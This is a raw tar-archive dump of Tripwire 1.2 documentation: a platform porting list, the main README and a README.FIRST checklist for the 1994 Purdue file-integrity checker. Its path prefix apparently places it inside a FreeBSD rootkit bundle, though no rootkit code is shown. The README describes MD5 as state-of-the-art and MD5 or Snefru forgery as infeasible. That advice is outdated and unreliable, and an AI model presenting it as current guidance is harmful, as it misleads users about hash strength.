conf-aix.h contributor: Shabbir Safdar contributor: John Sutton vendor: IBM/Intel box os: BSDI BSD/386 os version: beta compiler: gcc cflags: -O ldflags: none libs: none conf.h: conf-bsdi.h tw.config: notes: contributor: Michaela Harlander contributor: Gene Kim contributor: Eugene Zaustinsky vendor: IBM/Intel box os: Linux os version: 0.99.14 (gcc, flex 2.4.5, bison 1.18) compiler: gcc cflags: -O ldflags: none libs: none conf.h: conf-svr4.h tw.config: notes: *** see ./contrib/README.linux and ./contrib/README.flexbison contributor: Calvin Page vendor: MIPS Computer Systems os: EP/IX os version: 1.4.3 compiler: cc cflags: -O -systype sysv -I/usr/include/bsd -I/usr/include/sysv ldflags: none libs: -lbsd conf.h: conf-epix.h tw.config: (Gosh, I haven't submitted one yet) notes: contributor: Shabbir J. Safdar contributor: Michaela Harlander vendor: NeXT os: Mach (NeXTstep) os version: 2.x, 3.x compiler: cc cflags: -O (2.x), -O2 (3.0) ldflags: -Bstatic libs: none conf.h: conf-mach.h tw.config: (Gosh, I haven't submitted one yet) notes: contributor: Joe Polcari vendor: OSF os: OSF/1 os version: 1.0.4 compiler: cc cflags: -O libs: -lsun -lc_s ldflags: -non_shared conf.h: conf-osf1.h notes: contributor: Dean Brock vendor: OSF os: OSF/1 os version: 1.0.4 compiler: gcc cflags: -O -g libs: ldflags: conf.h: conf-osf1.h notes: contributor: Rich Salz vendor: Pyramid os: DC/OSx (SVR4) os version: 1.1 [all releases] compiler: cc cflags: -O -Kold ldflags: -dn libs: none conf.h: conf-svr4.h tw.config: contributor: Ken McDonell vendor: Pyramid os: OSx (att universe) os version: 5.1 [all releases] compiler: cc cflags: -OG ldflags: none libs: none conf.h: conf-osx-att.h tw.config: contributor: Ken McDonell vendor: Pyramid os: OSx (ucb universe) os version: 5.1 [all releases] compiler: cc cflags: -OG ldflags: none libs: none conf.h: conf-osx-ucb.h tw.config: contributor: Ken McDonell vendor: Sequent os: Dynix os version: 3.x compiler: cc cflags: -O ldflags: libs: -lseq (on some systems, like the one here at U of A) conf.h: conf-dynix.h notes: contributor: Gene Kim vendor: Sequent os: dynix/PTX os version: 2.0.x compiler: cc cflags: -O ldflags: none libs: none conf.h: conf-ptx2.h tw.config: notes: Don't confuse dynix/PTX with dynix. Dynix is notes: BSD and dynix/PTX is SYSV contributor: Michael Perrone vendor: Sun os: SunOS os version: 4.0.3 compiler: gcc, cc cflags: -O ldflags: -Bstatic libs: none conf.h: conf-bsd.h tw.config: I have submitted one notes: if you run ARM/ASET, see ./contrib/README.ASET contributor: Joe Polcari contributor: John Sutton contributor: Brad Powell vendor: Sun Microsystems, Inc. os: SunOS os version: 5.x (Solaris 2.x) compiler: cc cflags: -O ldflags: libs: conf.h: conf-svr4.h tw.config: tw.conf.sunos5 notes: contributor: Brad Powell contributor: Michaela Harlander contributor: Bob Cunningham vendor: SCO, Tandy os: Xenix os version: 03.02.00, 2.2.4 compiler: cc cflags: ldflags: libs: -lx conf.h: conf-xenix.h notes: contributor: Daniel Ray vendor: SCO os: ??? os version: ??? compiler: cc cflags: ldflags: libs: -lsocket conf.h: conf-sco2.h notes: contributor: Alain Williams vendor: Santa Cruz Operation os: XENIX System V 386 os version: 2.2.6 compiler: Microsoft C 5.1 cflags: -O ldflags: -s -lx libs: none conf.h: conf-sysv4.h [modified for xenix to support MAXNAMLEN] tw.config: notes: see all my email to you contributor: Daniel Ray vendor: SGI os: IRIX os version: 4.x compiler: cc cflags: -O -cckr libs: none ldflags: none conf.h: conf-svr4.h tw.config: tw.conf.irix notes: contributor: Bill Henderson contributor: John G. Sutton contributor: Keith W. Rickert vendor: SGI os: IRIX os version: 4.0.5 compiler: cc cflags: ldflags: libs: -lsun -lc_s conf.h: conf-irix4.h tw.config: tw.conf.irix notes: contributor: Simon Leinen contributor: Keith W. Rickert fbsdrootkit-1.2/tripwire-1.2/README100600 764 764 113203 5627323130 14217 0ustar dfdf## $Id: README,v 1.26 1994/08/26 08:22:48 gkim Exp $ ## ## README for Tripwire ## ## Gene Kim & Gene Spafford ## The COAST Project ## Department of Computer Sciences ## Purdue University ## ## All files in the distribution of Tripwire are Copyright 1992, 1993, 1994 ## by the Purdue Research Foundation of Purdue University. All rights ## reserved. Some individual files in this distribution may be covered ## by other copyrights, as noted in their embedded comments. ## ## Redistribution and use in source and binary forms are permitted ## provided that this entire copyright notice is duplicated in all such ## copies, and that any documentation, announcements, and other ## materials related to such distribution and use acknowledge that the ## software was developed at Purdue University, W. Lafayette, IN by ## Gene Kim and Eugene Spafford. No charge, other than an "at-cost" ## distribution fee, may be charged for copies, derivations, or ## distributions of this material without the express written consent ## of the copyright holder. Neither the name of the University nor the ## names of the authors may be used to endorse or promote products ## derived from this material without specific prior written ## permission. THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY ## EXPRESS OR IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE ## IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR ANY PARTICULAR ## PURPOSE. This README file serves as a quick-and-dirty primer on Tripwire. A PostScript formatted paper that fully describes the design and rationale is also included in the ./docs directory. The design document is also available as a technical report (TR-CSD-93/71). This document will be referenced throughout the Tripwire distribution as the Tripwire design document or the comprehensive Tripwire paper. This README file contains information needed to build, test, and run Tripwire. A table of contents follow: 0.0. If you were running an earlier version 1.0. Background 1.1. Goals of Tripwire 2.0. How to build Tripwire 2.1. Common Tripwire compilation problems 2.2. The siggen utility 3.0. Getting Tripwire up and running 3.1. Creating your tw.config file 3.2. A caveat about your Tripwire database 3.3. Testing Tripwire 3.4. Running Tripwire as an integrity checker 3.5. Keeping your database up-to-date 3.5.1. Running Tripwire in Interactive mode 3.5.2. Running Tripwire in Database Update mode 3.6. A quick-checking mode 4.0. Some Tripwire scaling hints for using Tripwire in large sites 4.1. The tw.config grammar 4.2. How you might use these directives 5.0. Notes on signature routines 5.1. Performance vs. security 6.0. Signature routines 6.1. MD5 6.2. Snefru 6.3. CRC-32 6.4. CRC-16 6.5. MD4 6.6. MD2 6.7. SHA/SHS 6.8. Haval 6.9. null signature 7.0. Feedback and bug-reports 8.0. User contributions 9.0. Acknowledgements 0.0. If you were running an earlier version ============================================ If you have been running an older version of Tripwire, please also read the WHATSNEW file for information on new functionalities. Version 1.2 of Tripwire uses an updated version of the database file (now version 4). Databases used with previous versions of Tripwire are not compatible with this release and need to be regenerated. We suggest that you do this as follows: * take your system to single-user mode * rerun your old version of Tripwire in verify mode using your current database * build and install v1.2 Tripwire * build your new database using your old config file * resume multi-user operation 1.0. Background ================ With the advent of increasingly sophisticated and subtle account break-ins on Unix systems, the need for tools to aid in the detection of unauthorized modification of files becomes clear. Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. 1.1. Goals of Tripwire ======================= Tripwire is a file and directory integrity checker, a utility that compares a designated set of files and directories against information stored in a previously generated database. Any differences are flagged and logged, including added or deleted entries. When run against system files on a regular basis, any changes in critical system files will be spotted -- and appropriate damage control measures can be taken immediately. With Tripwire, system administrators can conclude with a high degree of certainty that a given set of files remain free of unauthorized modifications if Tripwire reports no changes. 2.0. How to build Tripwire =========================== As of this writing, Tripwire has run successfully on (at least) BSD, OSF/1, Mach, Xenix, and late System V variants of Unix. Tripwire was built and tested on a wide variety of Unix variants. First of all, you should read through this entire README file before you modify any files or try to build the program. This text describes various settings and strategies for configuration and operation. Then, after you've thought about the operation of the system, come back to this section and follow the instructions. The file 'Ported' contains a list of platforms and operating systems where Tripwire has already been successfully ported. If you find your system in the list, note the system settings that were used to build Tripwire. Second, look through the Makefile and make sure that the C compiler and all flag settings are reasonable for your configuration. Most of the potentially tricky system settings should be listed in the 'Ported' file. Next, look in the './configs' directory to find a predefined 'conf-.h' file that matches closest to your operating system. Note this file, because you will be inserting this filename in the './include/config.h' file. If no such file exists, pick one "near" your system type and modify appropriately (then mail it back to us for a future release). ** Don't do anything with this file yet! In particular, don't copy ** it over the config.h file! (Instead, keep reading...) Now that you have chosen your operating system header file, edit the './include/config.h' file to tailor Tripwire to your system. Include the name of the predefined header file closest to your system at the appropriate line in config.h Paths and names of Tripwire configuration files are also set in the config.h file. Make sure you note the locations that Tripwire looks for its configuration and database files; change them for your system, as appropriate. NOTE: We *strongly* urge you to locate the Tripwire configuration files on a disk that can be made read-only with a hardware setting. This will prevent the files from being altered by an attacker. The run-time version of Tripwire should be located in the same place. If you are unable to mark a disk (or diskette) as read-only, you might also consider putting it on a remote partition of a more secure machine, and import it read-only. See the design document for the rationale behind this note if the concept is not obvious. Last, look in the './configs' directory again to find a tw.config file that matches your operating system. These files were custom-tailored to match the file layouts of various vendor-supplied operating systems. If no file in this subdirectory matches your system, choose the one that is closest in nature (e.g., BSD4.3 or SysV.4). Edit this file to include additional files and directories you want to monitor (e.g., local bins and critical databases), to correct paths if you have moved things or if they are mounted from a remote location (check them only on the server!), and to exclude locally-active files from the check. You should probably add the Tripwire binary itself to this file. See the next section for further details. After you have customized your tw.config file, copy it to the location that you specified in your config.h file. Next, simply type 'make' at the top level. Note that all Makefiles in the subdirectories are driven by the top-level Makefile. (i.e., typing 'make' in the ./src directory will probably not work.) Some common problems with building and using Tripwire are addressed in the FAQ file: you may want to read that if you have difficulties. 2.1. Common Tripwire compilation problems ========================================== Tripwire was originally written using ANSI C. However, Tripwire now compiles with K&R, too. All of the prototypes remain embedded between "#ifdef __STDC__" directives. Sadly, compiling under ANSI is sometimes noisier than with K&R. Therefore, go ahead and compile with K&R unless religion dictates ANSI. (The code lints completely clean, excepting the malloc() and exit() return values.) Common compilation trouble-spots are the dirent(S5)/direct(BSD) funkiness and #defines that changed for POSIX compliance. If the Tripwire test suite fails, consider trying the following: - double check that you're including the correct conf-*.h file in your ./include/config.h file. - change the CFLAGS definition in the Makefile so no optimization is done (i.e., remove the "-O" option). - do a "make clean". - try again. If this fails, try a different C compiler (e.g., GCC). It has been noted that newer versions of flex and bison (the GNU replacements for lex and yacc) do not generate code that passes all the test suites using the default Tripwire sources. Calvin Page helped contribute replacement config.pre.l and config.pre.y files that correct this problem. You'll find that using lex usually solves the problems that make the Tripwire test suite fail. If you use flex and bison, make sure you use the gcc compiler to avoid compile-time errors. 2.2. The siggen utility ========================== The siggen utility is provided so users can get signatures of files without having to run Tripwire. The syntax of siggen is simple. siggen [-0123456789aqv] [ file ... ] By default, siggen prints out all ten signatures. However, the signatures can be printed selectively by specifying the signature number on the command line. See the manual page for details. 3.0. Getting Tripwire up and running ===================================== Tripwire runs in either of four modes: Database Generation, Integrity Checking, Database Update, and Interactive Update mode. In order to run Integrity Checking, Tripwire must have a database to compare against. To do that, you must first specify the set of files for Tripwire to monitor. This list is stored in 'tw.config'. 3.1. Creating your tw.config file ================================== Edit your 'tw.config' file, or whatever filename you defined for the Tripwire config file, and add all the directories that contain files that you want monitored. The format of the config file is described in its header and in the man page. Pay especially close attention to the select-flags and omit-lists, which can significantly reduce the amount of uninteresting output generated by Tripwire. For example, you will probably want to omit files like mount tables that are constantly changed by the operating system. Next, run Tripwire with 'tripwire -initialize'. This will create a file called 'tw.db_[hostname]' in the directory you specified to hold your databases (where [hostname] will be replaced with your machine hostname). 3.2. A caveat about your Tripwire database =========================================== NOTE: Tripwire will detect changes made to files from this point on. You *must* be certain that the system on which you generate the initial database is clean, however --- Tripwire cannot detect unauthorized modifications that have already been made. One way to do this would be to take the machine to single-user mode, reinstall all system binaries, and run Tripwire in initialization mode before returning to multi-user operation. This database must be moved someplace where it cannot be modified. Because data from Tripwire is only as trustworthy as its database, choose this with care. We recommend placing all the system databases on a read-only disk (you need to be able to change the disk to writable during initialization and updates, however), or exporting it via read-only NFS from a "secure-server." (This pathname is hardcoded into Tripwire. Any time you change the pathname to the database repository, you must recompile Tripwire. This prevents a malicious intruder from spoofing Tripwire into giving a false "okay" message.) We also recommend that you make a hardcopy printout of the database contents right away. In the event that you become suspicious of the integrity of the database, you will be able to manually compare information against this hardcopy. We have yet to hear of a way for "crackers" to alter an old piece of printout made before they penetrated the system! You may also wish to generate a full set of signatures of the database, the configuration file, and the Tripwire executable using the "siggen" utility. (Be certain to generate siggen's signature too!) Store these on hardcopy for comparison if you need quick confirmation that the files involved have not changed. However, we advise that you do any comparison via a version of siggen stored on read-only media, or encrypted when not in use. 3.3. Testing Tripwire ====================== Tripwire includes a script-driven test suite that checks the top-level build directory against the distribution package. In the ./tests directory, there is a Tripwire database of the entire Tripwire source distribution and a tw.config file. The test script automatically converts the pathnames in these Tripwire files to match those of your system. After converting the files, it then runs Tripwire in Integrity Checking mode. To run the test, simply type 'make test' at the top level. This will invoke the script, and if all goes well, the output of Tripwire matches the expected values that the script provides. In addition to checking all the files in the Tripwire distribution, a number of signature and functional tests are run to ensure the correct operation of the compiled program. 3.4. Running Tripwire as an integrity checker ============================================== Once you have your database set up, you can run Tripwire in Integrity Checking mode by 'tripwire'. 3.5. Keeping your database up-to-date ====================================== A common setup for running Tripwire would mail the system administrator any output that it generates. However, some files on your system may change during normal operation, and this necessitates update of the Tripwire database. There are now two ways to update your Tripwire database. The first method is interactive, where Tripwire prompts the user whether each changed entry should be updated to reflect the current state of the file, while the second method is a command-line driven mode where specific files/entries are specified at run-time. 3.5.1. Running Tripwire in Interactive mode ============================================ Running Tripwire in Interactive mode is similar to the Integrity Checking mode. However, when a file or directory is encountered that has been added, deleted, or changed from what was recorded in the database, Tripwire asks the user whether the database entry should be updated. For example, if Tripwire were run in Interactive mode and a file's timestamps changed, Tripwire would print out what it expected the file to look like, what it actually found, and then prompt the user whether the file should be updated: /homes/genek/research/tw/src/preen.c st_mtime: Wed May 5 15:30:37 1993 Wed May 5 15:24:09 1993 st_ctime: Wed May 5 15:30:37 1993 Wed May 5 15:24:09 1993 ---> File: '/homes/genek/research/tw/src/preen.c ---> Update entry? [YN(y)nh?] y You could answer yes or no, where a capital 'Y' or 'N' tells Tripwire use your answer for the rest of the files. (The 'h' and '?' choices give you help and descriptions of the various inode fields.) While this mode may be the most convenient way of keeping your database up-to-date, it requires that the user be "at the keyboard." A more conventional command-line driven interface exists, and is described next. 3.5.2. Running Tripwire in Database Update mode ================================================ Tripwire supports incremental updates of its database on a per-file/directory or tw.config entry basis. Tripwire stores information in the database so it can associate any file in the database with the tw.config entry that generated it when the database was created. Therefore, if a single file has changed, you can: tripwire -update /etc/newly.installed.file Or, if an entire set of files that made up an entry in the tw.config file changed, you can: tripwire -update /usr/local/bin/Local_Package_Dir In either case, Tripwire regenerates the database entries for every specified file. A backup of the old database is created in the ./databases directory. Note that Tripwire can now handle arbitrary numbers of arguments in Database Update mode. This was added in version 1.0.1. The script ``twdb_check.pl'' was added in version 1.2 as an interim mechanism to ensure database consistency. Namely, when new entries are added to the tw.config file, database entries may no longer be associated with the proper entry number. The twdb_check.pl script analyzes the database, and remaps each database entry with its proper tw.config entry. The twdb_check functionality will be put into the Tripwire program in a future release. 3.6. A quick-checking mode =========================== Tripwire allows you to selectively skip certain signatures at run-time through a command-line option. For example, if you wish to run Tripwire on an hourly basis, even performing only MD5 checks might be computationally prohibitive. For this application, checking only the CRC32 signature might be desirable. To do this, assuming that only MD5, Snefru, and CRC32 were used when the database was initialized, you would type: tripwire -i 1 -i 2 This tells tripwire to ignore signature 1 and signature 2. Furthermore, for daily Tripwire runs, you could specify using only MD5 and CRC32. Finally, for weekly runs, you could run Tripwire with all three signatures. To find added or deleted files, with no signature checking, use: tripwire -i all 4.0. Some Tripwire scaling hints for using Tripwire in large sites =================================================================== The tw.config.5 manual page describes in detail the syntax supported by the tw.config file. Tripwire includes features that offer similar functionality to the C-preprocessor, and offer other directives that assist in the use of Tripwire at sites consisting of hundreds of workstations with local disk. 4.1. The tw.config grammar =========================== These commands are briefly described below: @@define VAR VALUE @@undef VAR @@ifhost HOSTNAME @@ifnhost HOSTNAME @@ifdef VAR @@ifndef VAR @@else @@endif @@include FILENAME Furthermore, the tw.config grammar also supports logical expressions. For example, you could have something like this in your tw.config file: @@ifhost spam.cc.purdue.edu || weiner.cc.purdue.edu ...entries... @@endif Besides the obvious cpp-like functionality, you can use @@define to create strings that are interpreted at run-time. For example: @@ifhost mentor.cc.purdue.edu @@ define TEMPLATE_S +pinug-cas0123456789 @@else @@ define TEMPLATE_S +pinug012-cas3456789 @@endif /etc/tw.loginfo @@TEMPLATE_S 4.2. How you might use these directives ======================================== Because Tripwire allows run-time interpretation of the tw.config file, it becomes possible for many different hosts to share the same tw.config file. This allows the maintenance of Tripwire configuration files to still be manageable in a large, heterogeneous environment. Although each host must still have different database file, this has few consequences except for disk space. 5.0. Notes on signature routines ================================= The RSA Data Security, Inc. MD5, MD4, and MD2 Message Digesting Algorithm, Snefru (the Xerox Secure Hash Function), SHA (the Secure Hash Algorithm), and Haval code have been changed to eliminate big-endian and little-endian run-time specific routines. These changes have been sent back to the authors, but we are not aware of any buy-backs yet. Until then, there will remain some differences between the code in this package and their respective virgin distributions. 5.1. Performance vs. security ============================== Normally, only one checksum per file would be enough to detect changes. For purposes of speed, an easy to calculate checksum would be preferred. However, most easy-to-calculate signatures are also easy to defeat if a determined attacker wished to do so (see the chart in the design document to see how easy this is to do with random comparisons). Tripwire includes six very difficult-to-forge signature algorithms, as well as two more conventional CRC routines. Using the default setup of recording two signatures (MD5 and Snefru) for each database entry gives very, very strong assurance that a file has not been tampered with. For tampering to have succeeded, the attacker would have had to have changed the file and added appropriate padding characters to recreate *both* checksums without also altering the size of the file. To do this at random might not even be possible with the MD5 and Snefru checksums used. Those two algorithms have not been exhaustively analyzed, but both are known to be strong message authentication codes. This added assurance is at a heavy price, however. The two algorithms, and Snefru in particular, are expensive to calculate. To run the MD5 and Snefru algorithms against every file is likely to be overkill for almost all systems (unless you have cpu cycles to spare!). Both checksums should be run over only the most critical files...like the Tripwire database and program, and perhaps each setuid and setgid file on your system. All other files can be checked with MD5 (or Haval) alone for much faster operation and a high level of assurance. The task of altering a file and recreating the original MD5 checksum is also very difficult, and it is unlikely that any but the most determined, sophisticated, and well-equipped attacker would be able to do it in finite time. To decrease the execution run-times of Tripwire, consider modifying your tripwire.config entries to ignore the Snefru (signature 2) attribute on files that do not need such stringent monitoring. This will skip the computationally-expensive Snefru signature collection entirely. Balancing this equation of security vs. speed is a decision best made by the administrator, most closely tailored to his/her site needs. For the extremely paranoid, Tripwire includes the MD2, MD4, SHA, and Haval signature algorithms, as well as the 16 and 32-bit CRC algorithms in its arsenal. Be forewarned, however, that MD2 is an order of magnitude slower than even Snefru, and probably guarantees no greater integrity checking. We include all these routines, however, so you can pick what you feel to be most appropriate for your site. You may wish to add other routines as checksum/signature generators. For instance, if you have a fast DES implementation (including chip-based generation), you might wish to encrypt the file using CBC mode and some fixed key, saving the final 128 bits of output as the signature. The configuration file routines have several signature flags that are currently bound to a null function, so there is room for this expansion if you wish. Clearly, with eight different signature algorithms at your disposal, Tripwire offers considerable flexibility in ensuring data security. Tripwire makes maintaining a trivial CRC database equally easy to administer and check as a full (but perhaps less practical) eight-signature database. The following section describes each of the eight signature algorithms. 6.0. Signature routines ======================== Tripwire ships with eight signature routines. This section briefly describes each signature routine. This is by no means an authoratative list, but it does attempt to give some background on each of the signature routines provided: MD5, Snefru, MD4, MD2, SHA, and Haval are all examples of message-digest algorithms (also known as one-way hash functions, fingerprinting routines, message authentication codes, or manipulation detection codes). They employ cryptographic techniques to ensure that any small change in the input stream results in immediate and widely diverging output. This way, even a small change in the input results in large change in the output. Therefore, any unauthorized, malicious, or accidental change will be evident. Furthermore, because these algorithms use a 128-bit or larger signature, using a brute-force attack to introduce a deliberate change in the file while trying to keep the same signature becomes a computationally infeasible task. The CRC algorithms, on the other hand, use simple polynomial division to generate the checksums. While this technique is very fast, the mathematics of this technique is well-understood. Additionally, since the signature space is so small (usually 16 or 32 bits), a brute-force search for a CRC collision is well within the capabilities of most workstations. There are currently several programs in the public domain that can, for any given input file, provide a different output file with the same CRC signature in 30 seconds or less. All observed timing measures provided for the signature routines were performed on a Sequent Symmetry with ten 16 Mhz 80386 processors. The numbers provided are simply an informal gauge of throughput, rather than any authoritative metric. 6.1. MD5 ========= MD5 is the RSA Data Security Inc. Message-Digest Algorithm, a proposed data authentication standard. The Internet Draft submission can be found as Internet Working Draft RFC 1321, available via anonymous FTP from NIC.DDN.MIL or from RSA.COM as ~/pub/md5.doc. MD5 attempts to address potential security risks found in the speedier, but less secure MD4, also by RSA Data Security Inc. MD5 was designed as a more conservative algorithm that backs "away from the edge" in terms of risks from successful cryptanalytic attack. MD5 generates a 128-bit signature, and uses four rounds to ensure pseudo-random output. Observed throughput is about 70 Kbytes/second. Currently, MD5 is considered by many to be a state-of-the-art signature algorithm. 6.2. Snefru ============ Snefru, the Xerox Secure Hash Function, was developed by Ralph Merkle at Xerox PARC. As an incentive to find a Snefru crack, there is a $1000 cash prize promised to anyone who can find two sets of input that map to the same signature. This reward has remained unclaimed since April 1990, when the 2-pass version of Snefru was broken by Eli Biham, a Ph.D. student of Adi Shamir. Currently, Ralph Merkle recommends using only the 4-pass version of Snefru, if not the 8-pass version. The Snefru README states, "Further study of the security of Snefru is required before production use is advisable." As shipped with Tripwire, Snefru is configured to run in 4-passes. Version 2.5 is the latest version available, and is the version included with Tripwire. Snefru is slower than MD5, but is recommended as a backup for MD5 as a primary signature. As configured, Snefru runs at about 31 Kbytes/second. Snefru can be obtained via anonymous FTP from arisia.xerox.com in directory /pub/hash. 6.3. CRC-32 ============ Cyclic Redundancy Checks have been the long been the de facto error detection algorithm standard. These algorithms are fast, robust, and provides reliable detection of errors associated with data transmission. It has been shown that CRC-32 has a minimum distance of 5 for block lengths of less than 4K. However, this decreases as the size of the blocks increases. Therefore, using CRC-32 on long files is certainly a misapplication of this signature algorithm. However, CRC-32 is provided as a fast and speedy alternative to the slower message-digest algorithms. The version of CRC-32 included with Tripwire was written by Gary S. Brown. This CRC-32 implementation runs at about 111 Kbytes/second. 6.4. CRC-16 ============ CRC-16 is the predecessor to CRC-32, using only 16 bits to store to the remainder of the data and the generator polynomial. CRC-16 is typically at the link level, usually done in hardware to detect transmission errors. This CRC-16 implementation runs at abut 131 Kbytes/second. 6.5. MD4 ========= MD4, the RSA Data Security Inc. Message-Digest Algorithm, is the predecessor to MD5 described above. It was also submitted as a standard data authentication algorithm, and is described in the Internet Working Draft 1320. The MD4 algorithm was designed to exploit 32-bit RISC architectures to maximize throughput. On a Sun SparcStation, throughput rates of over 1.4 Mbytes/second are achieved. MD4 can be obtained via anonymous FTP from RSA.COM in ~/pub. On a Sequent, MD4 throughput is about 332 Kbytes/second. 6.6. MD2 ========== The RSA Data Security, Inc. MD2 Message-Digest Algorithm was created as part of the Privacy Enhanced Mail package -- a package designed to authenticate and increase the security of electronic mail. Like the other algorithms by RSA Data Security, Inc presented here, MD2 generates a 128-bit signature. The MD2 algorithm is quite slow. On a 16 Mhz 80386, expect only 3 Kbytes/second. It is not clear that using this slower algorithm instead of MD5 brings any comparative advantage. The license for MD2 specifically states its use is exclusive to the Privancy Enhanced Mail package. Provisions have been made with RSA Data Security, Inc. for its inclusion and use in Tripwire in its present form. Note that MD2 is not in the public domain. 6.7. SHA/SHS ============= SHS is the NIST Digital Signature Standard, called the Secure Hash Standard. It is described in NIST FIPS 180. We refer to it as the SHA, or Secure Hash Algorithm, because we are using a non-certified implementation and we cannot claim standards conformance. SHA is about one-half as fast as MD5. It has been noted that SHS appears to be largely based on MD4 with several key enhancements, not all implemented in MD5. The mid-1994 correction to the algorithm at the behest of NSA (reflected in the default version compiled into Tripwire; see sigs/sha/sha.h) raises some questions about the overall strength of both SHA and MD4 in the minds of some cryptographers. 6.8. Haval =========== Haval was written by Yuliang Zheng at the University of Wollongong, and is described in Y. Zheng, J. Pieprzyk and J. Seberry: ``HAVAL --- a one-way hashing algorithm with variable length of output'', Advances in Cryptology --- AUSCRYPT'92, Lecture Notes in Computer Science, Springer-Verlag, 1993. Haval is shipped with Tripwire configured similarly to the other signature algorithms: 128 bit signature using four passes. Configured this way, Haval throughput is approximately 100K/sec. (30% faster than MD5.) 6.9. (null) ============ Well, sig_null_get() is not really a signature algorithm. Instead, it is a place holder for unused slots in the signature array. It will always return a single character, ``0''. 7.0. Feedback and bug-reports ============================== Please send any bug-reports, questions, feedback, or any comments to (tripwire-request@cs.purdue.edu). One or both Genes will try to answer questions as expeditiously as possible. 8.0. User contributions and experiences ======================================== The ./contrib directory contains several programs contributed by users during the beta-test period. Each program is accompanied by a README file written by the program author. Both Genes are willing to serve as clearinghouses for utilities that augment the Tripwire package. If you have something that you would like included in the Tripwire package, please contact either Gene Kim or Gene Spafford at the email addresses listed in the previous section. 8.1. Reports on subverting Tripwire ==================================== In early 1994, an "underground" hacker newsletter described how Tripwire database updates can be done by an intruder to prevent subsequent integrity checking runs from detecting tampered files. This attack was already documented in this README file, as well as in our design document. However, we use the appearance of this report to underscore the necessity to secure your database using physical means. (Mounting a file system read-only on the client side is less secure than exporting the file system read-only on the server side, both of which is far less secure than placing the database on some physical read-only media.) The afforementioned report also documents that Tripwire databases are usually stored in "/usr/adm/tcheck." If you wish to conceal Tripwire operation on your machine, you may want to use less predictable locations for Tripwire files. To the best of our knowledge, no site has been compromised where Tripwire was installed according to our recommendations without Tripwire reporting the attack. 9.0 Acknowledgements ===================== Dan Farmer, formerly of Sun Microsystems, Inc., for providing answers to questions of taste, and providing some impetus to finish this project during the summer of 1992. Shabbir Safdar for actually running early versions of Tripwire that popped up on an hourly basis. We also thank him for trying this on a few of the more exotic architectures around Purdue. Steve Weeber of Lawrence Livermore National Laboratory for insight into what sort of tools the Dept. of Energy has developed for in-house use, and comparisons of their functionality with Tripwire. Ralph Merkle of Xerox PARC for information on the Snefru one-way hash function. One of the directory printing routine in utils.c comes from the COPS package. It was from crc_check.c by Jon Zeeff. Eugene Zaustinsky for helping GeneK finally get all the signature routines right. It took three iterations and two patches, but things are finally kosher. This provided motivation for a more rigorous signature test suite, beyond just checking the signatures against the distribution build. Sam Gassel, Edward DeHart, Drew Gonczi, Rik Farrow, Jim Napier, Drew Jolliffe, John Rouillard, Alain Brossard, Eric Bergren, Patrick Sullivan, Nora Hermida, Juergen Schmidt, Debbie Pomerance, Michael Hines, Tim Ramsey, Georges Tomazi, Mitchell Marks, Philip Cox, Kevin Dupre', Chris Kern, and Eugene Zaustinsky helped in getting the Tripwire v1.1 release in shape for our December 1993 release. The 125 helpful beta testers that stuck with us during the six-week testing period. They put up with bugs, ever-changing interfaces and database file formats, and in one case, a flurry of conflicting patches in a thirty-minute period while GeneK and Spaf took turns saying, "Uh, oh." Tripwire v1.2 benefitted from the advice from many people. Asokan, Casper H.S. Dik, Paul Hilchey, Tom Orban Cal Page, Paul Szabo, and Eugene Zaustinsky all contributed code that we added to the release. (We list their contributions in the WHATSNEW file.) In addition, we thank the following people. Eric Berg, Eric M. Boehm, Lothar Butsch, John Crosswhite, Jason Downs, Peter Evans, Jon Freivald, Kevin Johnson, Lothar Kaul, Terry Kennedy, Chris Kern, Paul Madden, Fred Marchand, Mitchell Marks, Jim Moreno, Tom Orban, Lorraine Padour, Calvin Page, Tom Painter, Roger Peyton, Peter Phillips, Keith W. Rickert, Jim Roche, D Seddon, Paul Szabo, Gene C Van Nostern, John Wiegley, Robert Wilhite, Alain Williams, Eugene Zaustinsky, We appreciate the heroic effort of the Tripwire beta testers who suggested functional additions to Tripwire, found and hunted down bugs, and refined Tripwire beyond the authors' expectations. Special thanks go to: Walker Aumann, Lance R. Bailey, Michael Barnett, David Barr, Greg Black, Adrian P. van Bloois, J. Dean Brock, Kurt Cockrum, John Cristy, Jim Duncan, David S. Goldberg, Johannes Gronvall, Tom Gutnick, Michaela Harlander, Andreas Haug, Bill Henderson, Jim Hendrick, Norman Hill, Paul Joslin, Poul-Henning Kamp, Leslie Kordas, Simon Leinen, Philip Yzarn de Louraille, Stephen Mahler, Fletcher Mattox, Ken McDonell, Wes Morgan, Phil Moyer, Dan O'Neill, Joe Polcari, Phillip Porch, Brad Powell, W. Purvis, Daniel Ray, Dean Rich, Bill Romine, John P. Rouillard, Rich Salz, Christopher Samuel, Pete Shipley., David W. Smith, Harlan Stenn, Margarita Suarez, John G. Sutton, Tim Tessin, John Wagner, David Wiseman, Irving Wolfe, Stephen M. Youndt Extra kudos go to Ken McDonnell and Rich Salz for "raising the bar" of code quality through their wonderfully meticulous and insightful code-reviews during the beta-test period. E. Clinton Arbaugh provided extremely helpful advice and bug reports for the third patch release. He contributed greatly towards refinement in v1.0.4. GeneK and Spaf want to apologize in advance to anyone who sent us patches, comments or configuration info and whose name doesn't appear (but should). Please write to us and so we can correct the situation! Gene & Gene Kim & Spafford November 2, 1992 (gkim@cs.purdue.edu) (spaf@cs.purdue.edu) Last updated July 17, 1994 fbsdrootkit-1.2/tripwire-1.2/README.FIRST100600 764 764 2356 5630546455 15066 0ustar dfdfWhether you have used an earlier version of Tripwire, or whether you are a new user, we suggest that you do the following things in order to *properly* build and use Tripwire: 1) read the README file at least once 2) read the FAQ file 3) edit the include/config.h file to set the appropriate values for your site 4) go to single user mode for the remaining steps 5) reinstall your binaries to be certain they are safe 6) "make && make test" 7) go back and read the README and FAQ for real to understand why the test failed. :-) 8) move the Tripwire binary, any contrib/* scripts or programs, and copies of the configuration files to their final destination. 9) edit your copy of the config file to suit local needs 10)run Tripwire in initialization mode 11) set the destination directory's disk to "read-only" in hardware, and/or take standa-alone signatures of all the files using the "siggen" utility. 12) resume normal operations. Note that you can build and install Tripwire without reading the documentation, without setting a read-only disk, and without reinstalling your binaries. You can also leave your seat belt unbuckled when you drive, or leave your door unlocked when you leave. To understand what that all means, go to step #1. 